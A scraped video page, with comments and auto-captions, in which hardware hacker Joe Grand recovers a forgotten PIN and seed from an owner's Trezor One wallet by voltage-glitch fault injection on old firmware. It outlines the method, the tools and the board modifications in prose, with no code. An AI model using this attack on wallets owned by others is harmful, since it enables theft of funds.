How I hacked a hardware crypto wallet and recovered $2 million

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments

I read an article on this yesterday. Not certain if the same thing as this video, just incase I'm conflating them. It was one of the best written articles I read as it contained very easy to understand technical info on how it was done.

It has to do with creating an error fault while booting that allowed reading the password in ram.

Doesn't give me much hope that my trezor is truly unhackable.

https://www.theverge.com/2022/1/24/22898712/crypto-hardware-wallet-hacking-lost-bitcoin-ethereum-nft

πŸ‘οΈŽ︎ 135 πŸ‘€οΈŽ︎ u/slo1111 πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Should be noted that the reason this worked is that it was on old firmware, and the specific hack he used wouldn't work as the line in the source code that made it possible was removed in the next firmware update, so he(the guy who owned the device) was super lucky in that regard.

Its an interesting video for sure, I'd recommend giving it a watch

πŸ‘οΈŽ︎ 36 πŸ‘€οΈŽ︎ u/Suhmedoh πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

29 minutes of fluff with 3 minutes of actual hacking content.

πŸ‘οΈŽ︎ 93 πŸ‘€οΈŽ︎ u/vbisbest πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

It made me giggle that he burned incense to clear the air, prior to the hack

πŸ‘οΈŽ︎ 30 πŸ‘€οΈŽ︎ u/MokausiLietuviu πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Wow, congrats. Where did you get this hardware crypto wallet from?

Edit: Did not see it was a video. Watch it! So far it is very interesting. Appearantly someone asked to hack into it for him, since the password was lost.

πŸ‘οΈŽ︎ 18 πŸ‘€οΈŽ︎ u/junglebodygullefues πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Good find, thanks for sharing this.

πŸ‘οΈŽ︎ 4 πŸ‘€οΈŽ︎ u/pr0v0cat3ur πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Ahh, it's Kingpin from the l0pht. Long time no see lol

πŸ‘οΈŽ︎ 3 πŸ‘€οΈŽ︎ u/ozillator πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Great Video!

πŸ‘οΈŽ︎ 4 πŸ‘€οΈŽ︎ u/Talonzor πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

It's amazing! I wonder what wallets hackers generally choose to use, how about Coinhub?

πŸ‘οΈŽ︎ 2 πŸ‘€οΈŽ︎ u/Murky-Teaching-6240 πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies
Captions
what if you had a couple million dollars stored on a piece of silicon the size of a postage stamp and it was protected by a password that you forgot chips like this are in all sorts of different types of hardware wallets out there that are supposed to be used to protect your recovery seeds and your private information in the world of cryptocurrency but a lot of people forget their passwords and if you forget your password if you can't access the information on the chip you're out of luck you're out of money that's the problem we're dealing with today some guys contacted me out of the blue they have a trezor hardware wallet and they have a couple million dollars stored on a device like this and they want me to see if i can hack the wallet defeat the security and get access to the information so they can prove that the money is theirs i'm joe grant i'm a hardware hacker computer engineer hacking a product like this is an amazing challenge it's like solving a puzzle and we really only have one chance to do it right joe what's happening um sorry let me i got to take the electrical tape off my camera um how's it going good man good to connect and talk shop and hopefully make some progress on this stuff are you uh are you excited yeah you know in my mind honestly i've i've told myself that uh whatever happens one way or the other is gonna be a great story it's just gonna be a question of if it's gonna be a really expensive story or or not but either way it's gonna be one for the memory foam yeah hacking is nothing like what you see in the movies there's not graphical things moving all over the place it doesn't take a split second for something to happen it's a huge rollercoaster ride it's solving puzzles it's forcing computers and forcing hardware to do things that they weren't expecting to do you want them to misbehave in a way that you can control contract looks good i think the changes we wanted that are now accounted for for me as you know the main thing was just like getting that waiver of liability so you're not going to see me or something goes wrong for this project i've been working 12 weeks to try to defeat the security in a way that's reliable and that isn't hopefully going to erase the contents of the device now that we're here and we're filming it and dan is on his way and we're gonna do the real thing there's a lot that can go wrong you have the device you got it from jesse yeah the main thing that i'm kind of worried about bringing it through the x-ray um and maintaining control of it for the x-ray like you know the most electronics is going to be x-ray safe it's not like they're using super powerful x-ray what i've done a lot of times is like ask for a manual inspection yeah this thing isn't leaving my side what i'm doing with this attack is kind of like disabling an alarm system in a museum and stealing the jewels except actually it's like somebody made an exact copy of the jewels put them behind a locked door and then i went and kicked in the door and stole the jewels but then the original jewels are still there it's a little bit crazy that's sweet so i fly out 8 15 flight tomorrow don't drop the token honestly i'm more afraid of losing and endure dropping or misplacing the token and then the thing getting fried in in security i'm gonna i'm gonna duct tape it probably well don't duct tape it because that was literally going to duct tape it but any sort of tape will generate static electricity which we don't we don't want to do one of the most important things to me being a hacker is to discover some superpower and then educate other people about it inspire other people about it and help people using my skills when i was a kid that was not the case i got arrested for all sorts of computer related things and it was doing a lot of what i call technological juvenile delinquency but now that i know that i can use my superpowers for good and help people that's the beauty of hacking i'm informed that within 30 minutes the seven of you could make the internet unusable for the entire nation is that correct that's correct good morning my name is kingpin i am the youngest member of the loft and one of the electrical engineers and hardware hackers there's no malicious intent there's no criminal intent it's to help these guys who have lost their password get their money i'll see you tomorrow have a great flight be safe protect that treasure we'll do before we go forward let's go back to the basics cryptocurrency is a decentralized system of digital currency unlike traditional financial systems where trust of the currency is based on banks and governments with cryptocurrency the trust is based on the strength of the cryptography that it uses the type of cryptography that's used in cryptocurrency systems varies depending on the cryptocurrency but generally it falls into public key cryptography you have two pieces of your key the private key is something you keep to yourself and you use that to sign the transaction to prove that you initiated it the public key which is derived from the private key is used to verify the transaction the blockchain is a type of technology that's used with cryptocurrency as basically a decentralized digital ledger so every time there's a transaction that happens it's public and the ledger cannot be changed in the case of dan and jesse they lost their private key because that's something that's stored on their physical hardware wallet a hardware wallet is essentially a general purpose computer that's storing your private key but if you forget your password to your hardware wallet you're kind of screwed unless you find somebody like me good morning today is the day i'm gonna hack this wallet and we get to see if the three months of work was worth it so it's about 5 30 in the morning and i'm just waiting for my taxi to pick me up [Music] are you into crypto coins at all oh no i'm so afraid of all that kind of just pacing around my office even though i know it's possible it's still scary a few years ago a friend of mine and i were investing in buying some cryptocurrency not bitcoin one of these other unique coins that we wanted to buy so we put a little bit of money into it it's funny my wife actually came in today and she said joe have you read your horoscope and i'm like no i don't really read my horoscope for some reason she read the horoscope and it said something for virgos beware of problems with technology you had to put it on one of these hard wallets that kind of looked like a usb stick time went on the price of these coins went up and up and up in other news i just sliced my hand taking out the trash it's not my soldering hand which is good i hit him up and said time to free the client sell him and give me my money back turns out he forgot the password so he couldn't send me my money back you have all of my trezor devices over here that i've been using for the various attacks the one that's set up like this is what's going to be used for dan's attack the irony of it all is my friend that lost the password plays poker professionally for a living so he has he has like photographic memory he remembers everything he remembers my license plate from high school and of all things forgot a four digit pin password for this device let's clear the air for today so long story short i'm going to fly to portland oregon because i met some engineer hacker online all right let's go to the security who's going to hack this device and try to free all these coins so dan is on his way from new jersey and i hope he didn't put the trezor through the x-ray i just made it through airport security the device did have to go through the x-ray machine which is no big deal because computer scan and all the other devices can [Music] so dan is on the way with the wallet dan's coming and he's driving down the street backwards did he drive this way all the way from the airport how's it going nice meeting you i know great you exist you got the thing you got the thing awesome i heard you had to put it through the x-ray machine i did put it there right right no i'm good thanks yeah what are you guys filming um we are you want to tell them we're we're hacking a uh a hardware wallet that has a lot of cryptocurrency on it he forgot his password well i didn't forget the password okay let's begin so to add insult to injury on this whole thing with the treasure hard wallet if you attempt the password incorrectly too many times the contents of the wallet will erase and so we scoured the earth and google to try to find people that could help it turns out our most promising leads came down to joe this hacker we found on google and then these other guys in europe they are based in switzerland at some secret lab where they would perform the attack when i asked them if i can come to the lab to see what they were doing and ensure that this was legitimate and real they said that they couldn't do that i was willing enough for them to even like put a bag over my head and bring me to this lab just so i can see that they were not going to seal the device and actually do the work and right around that time joe started to make progress and for the first time show that he was able to crack the device and all the while joe was incredibly transparent with how he was performing the work very quickly it was clear he was engaged that's why i got on a plane this morning and came to portland to hopefully free the coins i tell people i'm a technology minimalist or like a technological curmudgeon because i know too much there's a lot of stories of people forgetting their passwords of hardware wallets and losing a whole lot of money this one was actually from 2017 a friend of mine mark fraunfelder had 7.4 bitcoins that were worth 3 000 and he had written his recovery seed on a piece of paper and the cleaning uh cleaning person came threw that out and he's like that's okay i still remember my pin but it turns out he also forgot his pin once he found somebody who could hack it it was worth 32 000 and it just shows that this was four years ago when cryptocurrency was in its infancy this was still happening here's another one this one man makes last ditch effort to recover 280 million in bitcoin he accidentally threw out so this guy had 7 500 bitcoins his private key was on a hard drive he had two hard drives that looked identical and it turns out he threw the wrong one out he realized after a couple months that the drive was missing the interesting thing is that the hard drive is in the local garbage dump it's a needle in a really disgusting haystack man has two guesses to unlock bitcoin worth 240 million dollars this is not uncommon and these are just the major stories and he wrote his password down on a piece of paper that he has lost crazy i i would almost guarantee with extreme certainty that we could hack something like that especially for that amount of money we'll figure it out for the trezor one device that i'm hacking on there have been exploits developed over time to break security of the device so when dan contacted me and said hey can you break the the trezor i was like sure i thought i'd be able to replicate some of the work that was out there what ended up happening is a long tale of three months of effort of trial and error and trying different techniques until i got it right i knew that the attack would need to take advantage of something called fault injection where we're basically causing misbehavior on the silicon chip inside of the device in order to defeat security and what ended up happening is i was sitting here watching the computer screen and saw that i was able to defeat the security the private information the recovery seed and the pin that i was going after popped up on the screen i kind of didn't think it was right because that's not what i was trying to do and ended up mentioning it to my wife later on she's like well so you did it and i'm like i guess when he couldn't recreate it i'm like all right and i walked into his office and i said okay tell me what you did take me through the process but i don't know what i did like i don't know how that happened and we were in there for an hour or so kind of going through it all recreate your steps retrace everything you did that day i said did you write it down did you write down everything you did and he showed me and he literally wrote everything he did then you said but then i did this and i did this and i talked to this person at the same time so i looked through my command line history of what i was doing on my computer and started at the beginning of the day would start a zoom call would run the commands that i had run on my computer completely separate from the actual attack was i plugging something in to my computer that was causing some glitch on the trezor that happened to be connected i just could not replicate what i did so he was really defeated and he can do anything so i in my mind my wife kept saying you know computers do what they're told which generally is true unless you force it to do something unintentional which is kind of what we're doing i slept on it woke up came downstairs looked through the source code of the treasure device because i figured at some point in that process that recovery seed and that pin had to be moved into that ram area that i was able to access through my debug interface this is exactly why i can perform my attack this mem copy function right here i checked future versions of firmware this was 1.6.0 in 1.6.1 the next small revision that function had been removed and the whole memory structure actually had been changed it turns out that i found an area in the source code where on power up the secret information gets copied into ram and then when i do my glitch to defeat the security of the chip to give me access to ram the contents are there and i could get them out i felt really good to help with something that i know nothing about so yeah let me give you a rundown of like the whole setup uh just so you can kind of get a feel for the process and what we're seeing in order for this attack to work we have to use a bunch of different hardware there's a security feature inside of the microcontroller inside of the trezor that prevents us from reading the memory contents so what we need to do is figure out a way to defeat that security so we can read the memory the security mechanism only happens on power up of the trezor device which means when we're doing our attack trying to defeat that check we need a way to power cycle the trezor over and over and over again in order to power cycle the trezor i'm using a device called the phi whisperer we're just using it to power the device on and off this glitch only works if we glitch the chip on power up so it's something where we have to turn the device on try to glitch it if it doesn't work turn the device off turn it on once power to the trezor is applied we want to try to defeat the security check at exactly the right time to trick the chip into thinking that we have access to it when in reality we shouldn't to do that we use a tool called the chip whisperer and we're using an attack called a fault injection or a voltage glitch that basically means that we're trying to force the chip into misbehaving in some way that's beneficial to us we're basically taking advantage of the fact that electronic systems are defined to operate within specific parameters and the vendor can only guarantee functionality within that area my question is what happens when we operate the device outside of that and that's what we're doing with glitching if we can glitch the chip at just the right time we're going to defeat the security and then we can continue with our attack i feel like i'm back in school yeah i mean it's it's like school except the tools are way more powerful now and the stakes are a little bit high a little bit higher yeah the way that we know that we've properly defeated security is that the chip will enable what's called a debug mode and a debug mode uses an external piece of hardware like this to let a legitimate engineer normally read memory and do general debugging of a microcontroller in the case of the trezor if we defeat the security feature it will enable debug mode and only let us access one particular area of memory which is the ram the recovery seed and the pin that private information that we need is copied into ram we also need to modify the trezor device to allow us to connect it up to the rest of our hardware that's going to look something like this all of the hardware pieces are tied together with this custom circuit board and if everything works properly then we win when miles my my nine-year-old came in here when i started doing this i'm like it's kind of like when you're glitching a video game yeah you know and like you find somebody find some bug and you can skip the level or do whatever he's like oh so you just have to get the timing right to do the glitch and i'm like yes um okay should we do it you can tell i'm nervous you're like cool and collected and i'm sitting here like tapping my feet and well i have it's out of my hands at this point you want to do it do the hand off yeah yeah let's do it okay all right okay wow there it is all righty thank you so now that i have it you're not allowed to touch it right great i don't want to touch it okay so in your hands this is it millions of dollars on this exact trezor wallet and we're gonna uh we're gonna hack it let's do it yeah okay so when was the last time you plugged this in that was recently right so yeah a couple weeks ago yeah okay all right so we know it worked then so what i'm going to do is i'm going to plug it in to my computer make sure that it actually confirms the firmware so it seems to function so far so now my computer is going to communicate with this device see what happens okay firmware is out of date that's good so this is 1.6 everything is set sweet now we can go and crack it open and start the one risk that we face here is breaking something as we're opening the case [Music] so i'm doing really light cuts here [Music] i can feel it part of part of it's getting through [Music] no damage on that side [Music] ta-da it has the conformal coating on it which is the protective layer to protect the components that makes a little bit harder for us to solder to the connections so my next step is to apply some chemicals to get rid of that coating and then start soldering wires okay i just like to get it as clean as possible [Music] stickers off i'm going to use a conformal coating remover pen and really we just need it over the connector that we're going to solder to and over the components that we're going to remove otherwise if we try to solder to those connections they might not make a good connection so now that heart epoxy just kind of peels right out i think that's good i'm gonna check it on the magnifying glass just to be sure it's actually removed [Music] okay we're good to go the next step is we have to remove a couple components from this board the components we're removing are capacitors and by removing them it makes the chip more susceptible to those little glitches and stuff that we're doing what i'm going to do is use my soldering iron and just very carefully heat both sides of the part and pull it off the board the risk at this stage is pulling off some of the circuit board with it uh which hopefully won't happen iron is on yeah there's two that we need to remove one is easier to get to than the other okay first one's off [Music] got it all right so those components are off now all i have to do is add the external connectors that's going to let us hook it up to the hardware over there [Music] [Music] okay [Laughter] it is prepped and ready let the glitching begin [Laughter] how you feeling now uh that's crazy stuff i'm gonna plug in our different hardware plug that into this connector there's an eyelash on the table now let's get our scope on let's look this guy up and so when i start this it's going to start our full glitch attack and it's going to go step by step trying the different glitch offsets until it hits let's just run the loop so this is the main loop it's going to power cycle check over and over again if the debug interface is opened as soon as it works we get that device id then we know it's wide open for us uh i'm gonna start it ready i'm ready here we go so now we wait this is it it's the police stakeout yeah we sit here and eat donuts and then a couple hours later something good happens should we take bets on how long it's gonna take i'll say it goes it's gonna go within within an hour good one hour i'm gonna i'm gonna say it's gonna be between three and four hours okay or it doesn't go within four hours and that that's a possibility too i mean it could could take longer it could take six hours could take more because we're only testing one a second and we're going through a pretty wide range of about 10 000 attempts uh but it might need to go through another loop before it hits it so we don't really know hopefully we don't have to stay overnight uh but we're just gonna let it run until it happens so what was happening is i was sitting here for hours at a time just looking making sure the lights were blinking and it got to the point where i was like i just want to like use my computer for other stuff so i made a little audible thing in here it's going to say say a little phrase when it comes up which is actually really strange because you're just sitting here and then it says it and you're like oh it worked um i'm gonna go for a pepperoni sweet vegan i pepperoni it blinking i see the i see the j-link blinking that makes me feel good what's actually interesting is there's sort of these like repeatable spikes here which i don't remember seeing before it's like one kilohertz that's really interesting so these spikes i'm guessing are gonna be from the lights so if that's the case we might want to change some of the lighting oh you think the lighting for the light and the frequency might be causing some issue i mean it still might work but i'm curious because this doesn't match what i saw so if you turn off the lights i think the spikes go away yeah so that's got to be something that wasn't here yeah when i was doing the testing before can we kill let's kill the lights let's see what happens let me try this one still there yeah yeah um okay i think it's this one still there still there how about this one still there wireless mic yeah let's i mean it could still glitch fine we have no idea but that just makes me a little nervous um i would disconnect this guy none of this should matter because it was all plugged in before but to be safe still there no let me turn off the robot lights okay hold that there i'm gonna power everything back on yeah it's still there it's that same repeating with that glitching well i have a ground here that's shared but i'm thinking like don't tell anyone don't forget your ground clip kids that's like engineering 101 it's almost always a stupid problem too and what's interesting is we were seeing the spikes because the ground wasn't connected but the chip was still seeing the right thing all the time but now it's set our signal looks way better this thing looks like it's happily glitching and now we want to now we wait yeah [Music] oh pizza's here nice the fuel of hackers it's good good it's got a little kick to it [Music] [Music] if i start acting erratically and lunging at the circuitry throw me to the ground there's like nothing to do there's literally nothing to do come on this is this is torture [Applause] [Laughter] [Applause] omg like they say on the internet okay so that was um three hours and three hours and 19 minutes which is right within that sweet spot oh my god but now the question is is that too far in the boot process did we miss an earlier glitch that's going to keep the contents in memory so why don't we find out i'm already shaking all right i'm too excited this is the literal money shot yeah right like this is the money shot okay so so we glitched it now i'm going to run the external program to extract the ram [Music] okay we've successfully copied the ram out of the device now we can run strings and look at that file which has been sucked off of this device so we're done with this hardware if the contents are in the ram we have it on my computer right now i'm so nervous right now you don't even understand i don't know if you can see like sweaty palms sweaty palms all right okay ready three two one [Applause] one two five one four we did it that's how you hack a wallet all that pain and suffering oh that actually reminds me um can you pay me now yeah that's awesome my god it was like that pause between clicking that command and seeing it come up is like oh i'm gonna get that oh yeah three theta look at that so that's it one two five one four and he thought it was one two one five or something like that clay you got four out of the five that's windows i have something to tell you i know you texted me how do you know it worked [Laughter] is that awesome yay thanks for the support family effort how did you feel happy why it's because you finished it it's cool that my dad's a hacker thanks that was cool i was sort of skeptical about it especially when he told me how much money there was on that i was like that's really risky well i knew he was going to do it so i wasn't as excited and shocked as i thought i'd be i mean i was happy very happy for him and everybody but i it wasn't a surprise this is what he needed i've been telling him for years that he needed something other than teaching he needed to do something else and i always say like you have this skill set so why are you not using it to the fullest potential so this helped him realize his strengths and his gifts been a pleasure yeah [Music] that was emotionally draining about a year probably a little bit less we thought at least i thought that we were never going to see this money again the coins were gone forever now we just went on this emotional roller coaster it's come to an end man that was crazy this project was a perfect example of what hardware hacking is all about the trials and the errors and the failures and the successes and having it all culminate in this final attack where we could extract the recovery seed from a protected microcontroller one thing that trezor does really well is they keep track of all of the security vulnerabilities that people have found and reported to them we don't see that a lot in the hardware space the fact that trezor has a website where they publish all of that information acknowledge that their problems and fix them is something that really should be applauded what we did with this hardware wallet is only just the beginning there are so many people out there with challenges whether other people have forgotten their passwords that we need to pull off of devices or they have other pieces of technology that they need to extract some piece of information from if you have some crazy story needing help with technology with cryptocurrency getting your passwords off feel free to reach out i'm always looking for new puzzles and new challenges and i'm ready to take it on [Music] you
Info
Channel: Joe Grand
Views: 4,645,674
Rating: undefined out of 5
Keywords: joe grand, electronics, hacker, Trezor, Ledger, Crypto, Cryptocurrency, Fault Injection, Voltage Glitching, Glitching, ChipWhisperer, Bitcoin, BTC, ETH, Ethereum, Theta, hacking, hardware, wallet
Id: dT9y-KQbqi4
Channel Id: undefined
Length: 32min 17sec (1937 seconds)
Published: Mon Jan 24 2022
Related Videos
Confessions of a Hacker known as Kingpin - Joe Grand Story
Altium Stories
432K
REAL DIAMONDS and GOLD in New York City Sidewalk Cracks!
Klesh
1.5M
DIGGING A SECRET TUNNEL Part 7
colinfurze
6.7M
"I Remove It Before Using The Phone!" Edward Snowden
BrainStation
3.6M
Hackers Testifying at the United States Senate, May 19, 1998 (L0pht Heavy Industries)
Joe Grand
416K
The real DARK WEB 😱 // How you can get easy access // Ransomware awareness
David Bombal
242K
I Spent $7,000 on LOST CARGO Packages
HopeScope
4M
One Guy Changed My Pizza Game Forever
Pro Home Cooks
4.2M
I'm Done with Electric Cars! Going back to Combustion Power - Here's Why!
Stavros969
1M
Hardware Wallet Hack: Ledger Nano S - f00dbabe
LiveOverflow
235K
Tesla’s 3-6-9 and Vortex Math: Is this really the key to the universe?
Mathologer
1.2M
How to Speak
MIT OpenCourseWare
7.8M
Solar 3.0: This New Technology Could Change Everything
Electric Future
2.8M
I'm EARNING $560 A DAY at home MINING BITCOIN and DOGE?!
VoskCoin
657K
This should be illegal… Battery Repair Blocking
Linus Tech Tips
3.1M
I Hacked Into My Own Car
Steve Mould
1.7M
99 Years Later... We Solved It
Physics Girl
6.3M
Ex-NSA hacker tools for real world pentesting
David Bombal
352K
Solving Wordle using information theory
3Blue1Brown
8.3M
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.